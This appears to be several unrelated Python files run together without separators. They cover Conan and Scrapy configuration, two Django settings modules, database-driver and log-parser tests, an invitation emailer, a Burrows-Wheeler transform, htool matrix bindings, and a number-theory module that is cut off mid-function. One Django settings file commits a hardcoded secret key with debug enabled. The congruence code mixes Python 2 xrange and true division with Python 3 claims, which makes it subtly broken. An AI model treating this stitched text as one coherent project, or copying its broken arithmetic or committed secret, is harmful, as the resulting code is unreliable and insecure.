        vsversion = str(self.conanfile.settings.compiler.version)

        # there is also ClCompile.RuntimeLibrary, but it's handling is a bit complicated, so skipping for now
        condition = " '$(Configuration)' == '%s' And '$(Platform)' == '%s' And '$(VisualStudioVersion)' == '%s' "\
                    % (configuration, platform, vsversion + '.0')

        name_multi = 'conanbuildinfo_multi.props'
        name_current = ('conanbuildinfo_%s_%s_%s.props' % (configuration, platform, vsversion)).lower()

        # Reuse an existing multi sheet so earlier configurations survive.
        multi_path = os.path.join(self.output_path, name_multi)
        if os.path.isfile(multi_path):
            content_multi = load(multi_path)
        else:
            content_multi = self.template

        # Add the conditional <Import> for this configuration unless an
        # identical one is already present.
        dom = minidom.parseString(content_multi)
        import_node = dom.createElement('Import')
        import_node.setAttribute('Condition', condition)
        import_node.setAttribute('Project', name_current)
        import_group = dom.getElementsByTagName('ImportGroup')[0]
        children = import_group.getElementsByTagName("Import")
        for node in children:
            if name_current == node.getAttribute("Project") and condition == node.getAttribute("Condition"):
                break
        else:
            import_group.appendChild(import_node)
        content_multi = dom.toprettyxml()
        # toprettyxml inserts blank lines between reparsed nodes; drop them.
        content_multi = "\n".join(line for line in content_multi.splitlines() if line.strip())

        vs_generator = VisualStudioGenerator(self.conanfile)
        content_current = vs_generator.content

        return {name_multi: content_multi, name_current: content_current}

# Scrapy settings for helloscrapy project
#
# For simplicity, this file contains only the most important settings by
# default. All the other settings are documented here:
#
#     http://doc.scrapy.org/en/latest/topics/settings.html
#

BOT_NAME = 'helloscrapy'

SPIDER_MODULES = ['helloscrapy.spiders']
NEWSPIDER_MODULE = 'helloscrapy.spiders'

# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'helloscrapy (+http://www.yourdomain.com)'

# Seconds to wait between consecutive requests to the same site.
DOWNLOAD_DELAY = 3
ROBOTSTXT_OBEY = True

"""
Django settings for djangoApp project.

Generated by 'django-admin startproject' using Django 1.10.5.

For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""

import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = 'r&j)3lay4i$rm44n%h)bsv_q(9ysqhl@7@aibjm2b=1)0fag9n'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'djangoApp.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'djangoApp.wsgi.application'


# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases

# Default startproject layout: a local SQLite file next to manage.py.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/

STATIC_URL = '/static/'

import os


# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# Read from the environment; a missing HERTZ_SECRET_KEY fails fast at startup.
SECRET_KEY = os.environ['HERTZ_SECRET_KEY']

# SECURITY WARNING: don't run with debug turned on in production!
# Any value other than the literal string 'False' enables debug mode.
DEBUG = os.environ['HERTZ_DEBUG'] != 'False'

# With DEBUG on, accept any host; otherwise only the configured host.
ALLOWED_HOSTS = ['*' if DEBUG else os.environ['HERTZ_HOST']]


# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'widget_tweaks',
    'attendance',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'hertz.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            os.path.join(BASE_DIR, 'templates'),
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'hertz.wsgi.application'


# Database
# Postgres when DATABASE_HOST is provided (e.g. docker-compose); otherwise a
# local SQLite file for development.

if 'DATABASE_HOST' in os.environ:
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.postgresql',
            'NAME': 'postgres',
            'USER': os.environ['POSTGRES_USER'],
            'PASSWORD': os.environ['POSTGRES_PASSWORD'],
            'HOST': os.environ['DATABASE_HOST'],
            'PORT': 5432,
        }
    }
else:
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.sqlite3',
            'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
        }
    }

# Password validation

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'America/Sao_Paulo'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)

STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')


# STATICFILES_DIRS = [
#     os.path.join(BASE_DIR, 'static'),
# ]

LOGIN_REDIRECT_URL = '/'
LOGIN_URL = '/login'

import re
import warnings

import ctds

from .base import TestExternalDatabase
from .compat import PY3, PY36, unicode_


class TestTdsParameter(TestExternalDatabase):
    """Integration tests for ctds.Parameter construction, comparison and reuse."""

    def test___doc__(self):
        self.assertEqual(
            ctds.Parameter.__doc__,
            '''\
Parameter(value, output=False)

Explicitly define a parameter for :py:meth:`.callproc`,
:py:meth:`.execute`, or :py:meth:`.executemany`. This is necessary
to indicate whether a parameter is *SQL* `OUTPUT` or `INPUT/OUTPUT`
parameter.

:param object value: The parameter's value.
:param bool output: Is the parameter an output parameter.
'''
        )

    def test_parameter(self):
        param1 = ctds.Parameter(b'123', output=True)
        self.assertEqual(param1.value, b'123')
        self.assertTrue(isinstance(param1, ctds.Parameter))

        param2 = ctds.Parameter(b'123')
        # Bug fix: this previously re-checked param1.value, leaving the
        # non-output parameter's value untested.
        self.assertEqual(param2.value, b'123')
        self.assertEqual(type(param1), type(param2))
        self.assertTrue(isinstance(param2, ctds.Parameter))

    def test___repr__(self):
        for parameter, expected in (
                (
                    ctds.Parameter(b'123', output=True),
                    "ctds.Parameter(b'123', output=True)" if PY3 else "ctds.Parameter('123', output=True)"
                ),
                (
                    ctds.Parameter(unicode_('123'), output=False),
                    "ctds.Parameter('123')" if PY3 else "ctds.Parameter(u'123')"
                ),
                (
                    ctds.Parameter(None),
                    "ctds.Parameter(None)"
                ),
                (
                    ctds.Parameter(ctds.SqlVarBinary(b'4321', size=10)),
                    "ctds.Parameter(ctds.SqlVarBinary(b'4321', size=10))"
                    if PY3 else
                    "ctds.Parameter(ctds.SqlVarBinary('4321', size=10))"
                )
        ):
            self.assertEqual(repr(parameter), expected)

    def _test__cmp__(self, __cmp__, expected, oper):
        # Shared driver for the comparison-operator tests below; ``expected``
        # holds, per case, either the boolean result or TypeError when the
        # comparison must fail (Python 3 unorderable types).
        cases = (
            (ctds.Parameter(b'1234'), ctds.Parameter(b'123')),
            (ctds.Parameter(b'123'), ctds.Parameter(b'123')),
            (ctds.Parameter(b'123'), ctds.Parameter(b'123', output=True)),
            (ctds.Parameter(b'123'), ctds.Parameter(b'1234')),
            (ctds.Parameter(b'123'), b'123'),
            (ctds.Parameter(b'123'), ctds.Parameter(123)),
            (ctds.Parameter(b'123'), unicode_('123')),
            (ctds.Parameter(b'123'), ctds.SqlBinary(None)),
            (ctds.Parameter(b'123'), 123),
            (ctds.Parameter(b'123'), None),
        )

        for index, args in enumerate(cases):
            operation = '[{0}]: {1} {2} {3}'.format(index, repr(args[0]), oper, repr(args[1]))
            if expected[index] == TypeError:
                try:
                    __cmp__(*args)
                except TypeError as ex:
                    # The error message format changed in Python 3.6.
                    regex = (
                        r"'{0}' not supported between instances of '[^']+' and '[^']+'".format(oper)
                        if not PY3 or PY36
                        else
                        r'unorderable types: \S+ {0} \S+'.format(oper)
                    )
                    self.assertTrue(re.match(regex, str(ex)), ex)
                else:
                    self.fail('{0} did not fail as expected'.format(operation)) # pragma: nocover
            else:
                self.assertEqual(__cmp__(*args), expected[index], operation)

    def test___cmp__eq(self):
        self._test__cmp__(
            lambda left, right: left == right,
            (
                False,
                True,
                True,
                False,
                True,
                False,
                not PY3,
                False,
                False,
                False,
            ),
            '=='
        )

    def test___cmp__ne(self):
        self._test__cmp__(
            lambda left, right: left != right,
            (
                True,
                False,
                False,
                True,
                False,
                True,
                PY3,
                True,
                True,
                True,
            ),
            '!='
        )

    def test___cmp__lt(self):
        self._test__cmp__(
            lambda left, right: left < right,
            (
                False,
                False,
                False,
                True,
                False,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
            ),
            '<'
        )

    def test___cmp__le(self):
        self._test__cmp__(
            lambda left, right: left <= right,
            (
                False,
                True,
                True,
                True,
                True,
                TypeError if PY3 else False,
                TypeError if PY3 else True,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
                TypeError if PY3 else False,
            ),
            '<='
        )

    def test___cmp__gt(self):
        self._test__cmp__(
            lambda left, right: left > right,
            (
                True,
                False,
                False,
                False,
                False,
                TypeError if PY3 else True,
                TypeError if PY3 else False,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
            ),
            '>'
        )

    def test___cmp__ge(self):
        self._test__cmp__(
            lambda left, right: left >= right,
            (
                True,
                True,
                True,
                False,
                True,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
                TypeError if PY3 else True,
            ),
            '>='
        )

    def test_typeerror(self):
        for case in (None, object(), 123, 'foobar'):
            self.assertRaises(TypeError, ctds.Parameter, case, b'123')

        self.assertRaises(TypeError, ctds.Parameter)
        self.assertRaises(TypeError, ctds.Parameter, output=False)

        for case in (None, object(), 123, 'foobar'):
            self.assertRaises(TypeError, ctds.Parameter, b'123', output=case)

    def test_reuse(self):
        # A Parameter object must be safely reusable across executions.
        with self.connect() as connection:
            with connection.cursor() as cursor:
                for value in (
                        None,
                        123456,
                        unicode_('hello world'),
                        b'some bytes',
                ):
                    for output in (True, False):
                        parameter = ctds.Parameter(value, output=output)
                        for _ in range(0, 2):
                            # Ignore warnings generated due to output parameters
                            # used with result sets.
                            with warnings.catch_warnings(record=True):
                                cursor.execute(
                                    '''
                                    SELECT :0
                                    ''',
                                    (parameter,)
                                )
                                self.assertEqual(
                                    [tuple(row) for row in cursor.fetchall()],
                                    [(value,)]
                                )

import copy

import pytest

from peek.line import InvalidIpAddressException, Line, InvalidStatusException

# 127.0.0.1 - - [01/Jan/1970:00:00:01 +0000] "GET / HTTP/1.1" 200 193 "-" "Python"
# Parsed fields of the sample access-log line shown above, as raw strings
# (Line is expected to coerce timestamp/status/size to richer types).
test_line_contents = {
    'ip_address': '127.0.0.1',
    'timestamp':  '[01/Jan/1970:00:00:01 +0000]',
    'verb':       'GET',
    'path':       '/',
    'status':     '200',
    'size':       '193',
    'referrer':   '-',
    'user_agent': 'Python'
}


def get_updated_line_contents(updates=None):
    """Return a deep copy of test_line_contents, optionally overridden.

    updates: mapping merged over the copied fields, or None for no changes.
    """
    contents = copy.deepcopy(test_line_contents)
    if updates is not None:
        contents.update(updates)
    return contents


test_line = Line(line_contents=test_line_contents)


class TestLineInstantiation:
    """Each raw field must be coerced to its expected value on the Line."""

    @pytest.mark.parametrize('expected,actual', [
        ('127.0.0.1', test_line.ip_address),
        (1, test_line.timestamp),
        ('GET', test_line.verb),
        ('/', test_line.path),
        (200, test_line.status),
        (193, test_line.byte_count),
        ('-', test_line.referrer),
        ('Python', test_line.user_agent)
    ])
    def test_retrieval(self, expected, actual):
        assert expected == actual


class TestLineExceptions:
    """Invalid field values must raise the dedicated parsing exceptions."""

    def test_passing_invalid_ip_address_throws_exception(self):
        with pytest.raises(InvalidIpAddressException):
            # The constructed Line was previously bound to an unused local.
            Line(line_contents=get_updated_line_contents({'ip_address': 'foobar'}))

    def test_passing_non_parseable_status_throws_exception(self):
        with pytest.raises(InvalidStatusException):
            Line(line_contents=get_updated_line_contents({'status': 'foobar'}))

import logging
import requests
from django.conf import settings
from django.contrib.sites.models import Site
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.utils import timezone

from invitations.models import Invitation

# Channel for routine email activity logging.
logger = logging.getLogger('email')
# Channel for error reporting — presumably routed to Sentry via handler
# configuration elsewhere; confirm in the logging settings.
sentry = logging.getLogger('sentry')

def send_invite(message):
    """Send the invitation email described by *message*.

    message: dict carrying an 'id' key for an Invitation that is still
    PENDING or ERROR.  The invitation is moved to PROCESSING, then to SENT
    (with a timestamp) on success or ERROR on failure.  Missing invitations
    are logged and ignored.
    """
    try:
        invite = Invitation.objects.get(
            id=message.get('id'),
            status__in=[Invitation.PENDING, Invitation.ERROR],
        )
    except Invitation.DoesNotExist:
        sentry.error("Invitation to send not found", exc_info=True, extra={'message': message})
        return
    # Mark as in-flight so concurrent workers skip it.
    invite.status = Invitation.PROCESSING
    invite.save()
    context = {
        'invite': invite,
        'domain': Site.objects.get_current().domain,
    }
    subject = "[ContactOtter] Invitation to join ContactOtter from %s" % (invite.sender)
    if invite.book:
        subject = "[ContactOtter] Invitation to share %s's contact book" % (invite.sender)
    txt = get_template('email/invitation.txt').render(context)
    html = get_template('email/invitation.html').render(context)
    try:
        # Named distinctly so it does not shadow the *message* argument.
        email_message = EmailMultiAlternatives(
            subject=subject,
            body=txt,
            from_email="ContactOtter <invites@contactotter.com>",
            to=[invite.email,],
        )
        email_message.attach_alternative(html, "text/html")
        email_message.send()
        invite.status = Invitation.SENT
        invite.sent = timezone.now()
        invite.save()
    except Exception:
        # Bug fix: a bare ``except:`` also swallowed SystemExit and
        # KeyboardInterrupt; failures are still recorded on the invitation.
        sentry.exception('Problem sending invite', exc_info=True, extra={'invite_id': invite.id})
        invite.status = Invitation.ERROR
        invite.save()


def burrows_wheeler(text):
    """Calculates the burrows wheeler transform of <text>.

    returns the burrows wheeler string and the suffix array indices
    The text is assumed to not contain the character $"""

    sentinel_text = text + "$"
    size = len(sentinel_text)

    # Every cyclic rotation paired with its starting offset; sorting the
    # pairs orders them lexicographically by rotation (offsets are unique,
    # so the tiebreaker never fires).
    rotations = [(sentinel_text[k:] + sentinel_text[:k], k) for k in range(size)]
    rotations.sort()

    # The transform is the last column of the sorted rotation matrix; the
    # offsets give the suffix-array indices.
    transformed = "".join(rotation[-1] for rotation, _ in rotations)
    indices = [start for _, start in rotations]
    return transformed, indices

#!/usr/bin/env python
# coding: utf-8

import os,sys
import ctypes
import numpy as np
from .hmatrix import _C_HMatrix, HMatrix


class _C_MultiHMatrix(ctypes.Structure):
    """Holder for the raw data from the C++ code."""
    # Opaque: no _fields_ declared — instances are only handled through
    # pointers passed to and from the shared library.
    pass


class AbstractMultiHMatrix:
    """Common code for the two actual MultiHMatrix classes below.

    Subclasses must provide ``lib`` (the loaded shared C++ library) and
    ``dtype`` (the scalar type used for matvec buffers).
    """

    ndim = 2  # To mimic a numpy 2D array

    def __init__(self, c_data: _C_MultiHMatrix, **params):
        # Users should use one of the two constructors below.

        self.c_data = c_data
        # Global shape and the number of stored HMatrices are queried
        # from the C++ side via the subclass-provided `lib`.
        self.shape = (self.lib.multi_nbrows(c_data), self.lib.multi_nbcols(c_data))
        self.size = self.lib.nbhmats(c_data)


        self.lib.getHMatrix.restype=ctypes.POINTER(_C_HMatrix)
        self.lib.getHMatrix.argtypes=[ctypes.POINTER(_C_MultiHMatrix), ctypes.c_int]

        # Wrap every underlying HMatrix once, so __getitem__ is a cheap
        # list lookup later.
        self.hmatrices = []
        for l in range(0,self.size):
            c_data_hmatrix = self.lib.getHMatrix(self.c_data,l)
            self.hmatrices.append(HMatrix(c_data_hmatrix,**params))


        self.params = params.copy()

    @classmethod
    def from_coefs(cls, getcoefs, nm, points_target, points_source=None, **params):
        """Construct an instance of the class from an evaluation function.

        Parameters
        ----------
        getcoefs: Callable
            A function evaluating an array of matrices at given coordinates.
        nm: int
            Number of matrices in the array (passed through to the backend).
        points_target: np.ndarray of shape (N, 3)
            The coordinates of the target points. If points_source=None, also the coordinates of the target points
        points_source: np.ndarray of shape (N, 3)
            If not None; the coordinates of the source points.
        epsilon: float, keyword-only, optional
            Tolerance of the Adaptive Cross Approximation
        eta: float, keyword-only, optional
            Criterion to choose the blocks to compress
        minclustersize: int, keyword-only, optional
            Minimum shape of a block
        maxblocksize: int, keyword-only, optional
            Maximum number of coefficients in a block

        Returns
        -------
        MultiHMatrix or ComplexMultiHMatrix
        """
        # Set params.
        cls._set_building_params(**params)

        # Boilerplate code for Python/C++ interface.
        _getcoefs_func_type = ctypes.CFUNCTYPE(None, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_double))
        if points_source is None:
            # Symmetric build: the target points double as source points.
            cls.lib.MultiHMatrixCreateSym.restype = ctypes.POINTER(_C_MultiHMatrix)
            cls.lib.MultiHMatrixCreateSym.argtypes = [
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                _getcoefs_func_type,
                ctypes.c_int
            ]

            # Call the C++ backend.
            c_data = cls.lib.MultiHMatrixCreateSym(points_target, points_target.shape[0], _getcoefs_func_type(getcoefs),nm)

        else:
            cls.lib.MultiHMatrixCreate.restype = ctypes.POINTER(_C_MultiHMatrix)
            cls.lib.MultiHMatrixCreate.argtypes = [
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                _getcoefs_func_type,
                ctypes.c_int
            ]

            # Call the C++ backend.
            c_data = cls.lib.MultiHMatrixCreate(points_target,points_target.shape[0],points_source, points_source.shape[0], _getcoefs_func_type(getcoefs),nm)

        return cls(c_data, **params)


    @classmethod
    def from_submatrices(cls, getsubmatrix, nm, points_target, points_source=None, **params):
        """Construct an instance of the class from a submatrix evaluation function.

        Parameters
        ----------
        getsubmatrix: Callable
            A function evaluating the matrix in a given range.
        nm: int
            Number of matrices in the array (passed through to the backend).
        points_target: np.ndarray of shape (N, 3)
            The coordinates of the target points. If points_source=None, also the coordinates of the source points.
        points_source: np.ndarray of shape (N, 3)
            If not None; the coordinates of the source points.
        epsilon: float, keyword-only, optional
            Tolerance of the Adaptive Cross Approximation
        eta: float, keyword-only, optional
            Criterion to choose the blocks to compress
        minclustersize: int, keyword-only, optional
            Minimum shape of a block
        maxblocksize: int, keyword-only, optional
            Maximum number of coefficients in a block

        Returns
        -------
        MultiHMatrix or ComplexMultiHMatrix
        """
        # Set params.
        cls._set_building_params(**params)

        # Boilerplate code for Python/C++ interface.
        _getsumatrix_func_type = ctypes.CFUNCTYPE(
                None, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int),
                ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_double)
            )
        if points_source is None:
            # Symmetric build: the target points double as source points.
            cls.lib.MultiHMatrixCreatewithsubmatSym.restype = ctypes.POINTER(_C_MultiHMatrix)
            cls.lib.MultiHMatrixCreatewithsubmatSym.argtypes = [
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                _getsumatrix_func_type,
                ctypes.c_int
            ]

            # Call the C++ backend.
            c_data = cls.lib.MultiHMatrixCreatewithsubmatSym(points_target, points_target.shape[0], _getsumatrix_func_type(getsubmatrix),nm)
        else:
            cls.lib.MultiHMatrixCreatewithsubmat.restype = ctypes.POINTER(_C_MultiHMatrix)
            cls.lib.MultiHMatrixCreatewithsubmat.argtypes = [
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                np.ctypeslib.ndpointer(dtype=np.float64, ndim=2, flags='C_CONTIGUOUS'),
                ctypes.c_int,
                _getsumatrix_func_type,
                ctypes.c_int
            ]

            # Call the C++ backend.
            c_data = cls.lib.MultiHMatrixCreatewithsubmat(points_target,points_target.shape[0],points_source, points_source.shape[0], _getsumatrix_func_type(getsubmatrix),nm)

        return cls(c_data, **params)

    @classmethod
    def _set_building_params(cls, *, eta=None, minclustersize=None, epsilon=None, maxblocksize=None):
        """Put the parameters in the C++ backend.

        Each backend setter is configured and invoked only when the
        caller actually supplied the corresponding keyword, so unset
        parameters keep whatever value the backend already has.
        """
        if epsilon is not None:
            cls.lib.setepsilon.restype = None
            cls.lib.setepsilon.argtypes = [ ctypes.c_double ]
            cls.lib.setepsilon(epsilon)

        if eta is not None:
            cls.lib.seteta.restype = None
            cls.lib.seteta.argtypes = [ ctypes.c_double ]
            cls.lib.seteta(eta)

        if minclustersize is not None:
            cls.lib.setminclustersize.restype = None
            cls.lib.setminclustersize.argtypes = [ ctypes.c_int ]
            cls.lib.setminclustersize(minclustersize)

        if maxblocksize is not None:
            cls.lib.setmaxblocksize.restype = None
            cls.lib.setmaxblocksize.argtypes = [ ctypes.c_int ]
            cls.lib.setmaxblocksize(maxblocksize)

    def __str__(self):
        return f"{self.__class__.__name__}(shape={self.shape})"

    def __getitem__(self, key):
        """Return the key-th HMatrix (wrappers were pre-built in __init__)."""
        return self.hmatrices[key]

    def matvec(self, l , vector):
        """Matrix-vector product (interface for scipy iterative solvers)."""

        assert self.shape[1] == vector.shape[0], "Matrix-vector product of matrices of wrong shapes."

        # Boilerplate for Python/C++ interface
        self.lib.MultiHMatrixVecProd.argtypes = [
                ctypes.POINTER(_C_MultiHMatrix),
                ctypes.c_int,
                np.ctypeslib.ndpointer(self.dtype, flags='C_CONTIGUOUS'),
                np.ctypeslib.ndpointer(self.dtype, flags='C_CONTIGUOUS')
                ]

        # Initialize vector
        result = np.zeros((self.shape[0],), dtype=self.dtype)

        # Call C++ backend
        self.lib.MultiHMatrixVecProd(self.c_data,l , vector, result)
        return result


class MultiHMatrix(AbstractMultiHMatrix):
    """A real-valued hierarchical matrix based on htool C++ library.
    Create with MultiHMatrix.from_coefs or MultiHMatrix.from_submatrices.

    Attributes
    ----------
    c_data:
        Pointer to the raw data used by the C++ library.
    shape: Tuple[int, int]
        Shape of the matrix.
    nb_dense_blocks: int
        Number of dense blocks in the hierarchical matrix.
    nb_low_rank_blocks: int
        Number of sparse blocks in the hierarchical matrix.
    nb_blocks: int
        Total number of blocks in the decomposition.
    params: dict
        The parameters that have been used to build the matrix.
    """
    # The double-precision backend library is resolved once, at class
    # definition (import) time.
    # NOTE(review): on a platform other than linux/darwin/win32 no `lib`
    # attribute is defined, which surfaces later as an AttributeError —
    # confirm whether that is intentional.
    libfile = os.path.join(os.path.dirname(__file__), '../libhtool_shared')
    if 'linux' in sys.platform:
        lib = ctypes.cdll.LoadLibrary(libfile+'.so')
    elif sys.platform == 'darwin':
        lib = ctypes.cdll.LoadLibrary(libfile+'.dylib')
    elif sys.platform == 'win32':
        lib = ctypes.cdll.LoadLibrary(libfile+'.dll')
    dtype = ctypes.c_double  # scalar type used for matvec buffers


class ComplexMultiHMatrix(AbstractMultiHMatrix):
    """A complex-valued hierarchical matrix based on htool C++ library.
    Create with ComplexMultiHMatrix.from_coefs or ComplexMultiHMatrix.from_submatrices.

    Attributes
    ----------
    c_data:
        Pointer to the raw data used by the C++ library.
    shape: Tuple[int, int]
        Shape of the matrix.
    nb_dense_blocks: int
        Number of dense blocks in the hierarchical matrix.
    nb_low_rank_blocks: int
        Number of sparse blocks in the hierarchical matrix.
    nb_blocks: int
        Total number of blocks in the decomposition.
    params: dict
        The parameters that have been used to build the matrix.
    """
    # The complex backend library is resolved once, at class definition
    # (import) time.
    # NOTE(review): same platform gap as MultiHMatrix — no `lib` is
    # defined on unsupported platforms; confirm whether intentional.
    libfile = os.path.join(os.path.dirname(__file__), '../libhtool_shared_complex')
    if 'linux' in sys.platform:
        lib = ctypes.cdll.LoadLibrary(libfile+'.so')
    elif sys.platform == 'darwin':
        lib = ctypes.cdll.LoadLibrary(libfile+'.dylib')
    elif sys.platform == 'win32':
        lib = ctypes.cdll.LoadLibrary(libfile+'.dll')
    dtype = np.complex128  # scalar type used for matvec buffers


import primes as py

def lcm(a, b):
    """Return the least common multiple of integers a and b.

    Uses floor division: a * b is always divisible by gcd(a, b), so the
    result stays exact, and unlike true division `/` it remains an int
    on Python 3 instead of silently becoming a float.
    """
    return a * b // gcd(a, b)
 
def gcd(a, b):
    """Return the greatest common divisor of a and b (Euclid's algorithm)."""
    while b:
        a, b = b, a % b
    return a

# Returns two integers x, y such that gcd(a, b) = ax + by
def egcd(a, b):
    if a == 0:
        return (0, 1)
    else:
        y, x = egcd(b % a, a)
        return (x - (b // a) * y, y)

# Returns an integer x such that ax = 1(mod m)
def modInverse(a, m):
    x, y = egcd(a, m)
    if gcd(a, m) == 1:
        return x % m

# Reduces linear congruence to form x = b(mod m)
def reduceCongr(a, b, m):
        gcdAB = gcd(a, b)
        a /= gcdAB
        b /= gcdAB
        m /= gcd(gcdAB, m)
        modinv = modInverse(a, m)
        b *= modinv
        return (1, b, m)
        
# Returns the incongruent solutions to the linear congruence ax = b(mod m)
def linCongr(a, b, m):
        solutions = set()
        if (b % gcd(a, m) == 0):
                numSols = gcd(a, m)
                sol = (b * egcd(a, m)[0] / numSols) % m
                for i in xrange(0, numSols):
                        solutions.add((sol + m * i / numSols) % m)
        return solutions

# Uses the Chinese Remainder Theorem to solve a system of linear congruences
def crt(congruences):
        x = 0
        M = 1
        for i in xrange(len(congruences)):
                M *= congruences[i][2]
                congruences[i] = reduceCongr(congruences[i][0], congruences[i][1], congruences[i][2])

        for j in xrange(len(congruences)):
                m = congruences[j][2]
                if gcd(m, M/m) != 1:
                        return None
                x += congruences[j][1] * modInverse(M/m, m) * M / m

        return x % M

# Returns the incongruent solution to any system of linear congruences
def linCongrSystem(congruences):
        newCongruences = []
        for i in xrange(len(congruences)):
                congruences[i] = reduceCongr(congruences[i][0], congruences[i][1], congruences[i][2])
                
                # Tests to see whether the system is solvable
                for j in xrange(len(congruences)):
                        if congruences[i] != congruences[j]:
                                if (congruences[i][1] - congruences[j][1]) % gcd(congruences[i][2], congruences[j][2]) != 0:
                                        return None
                
                # Splits moduli into prime powers
                pFactor = py.primeFactorization(congruences[i][2])
                for term in pFactor:
                        newCongruences.append((1, congruences[i][1], term[0] ** term[1]))

        # Discards redundant congruences
        newCongruences = sorted(newCongruences, key=lambda x: x[2], reverse = True)
        finalCongruences = []
        for k in xrange(len(newCongruences)):
                isRedundant = False
                for l in xrange(0, k):
                        if newCongruences[l][2] % newCongruences[k][2] == 0:
                                isRedundant = True
                if not isRedundant:
                        finalCongruences.append(newCongruences[k])

        return crt(finalCongruences)

# Returns incongruents solutions to a polynomial congruence
def polyCongr(coefficients, m):
        solutions = []
        for i in xrange(m):
                value = 0
                for degree in xrange(len(coefficients)):
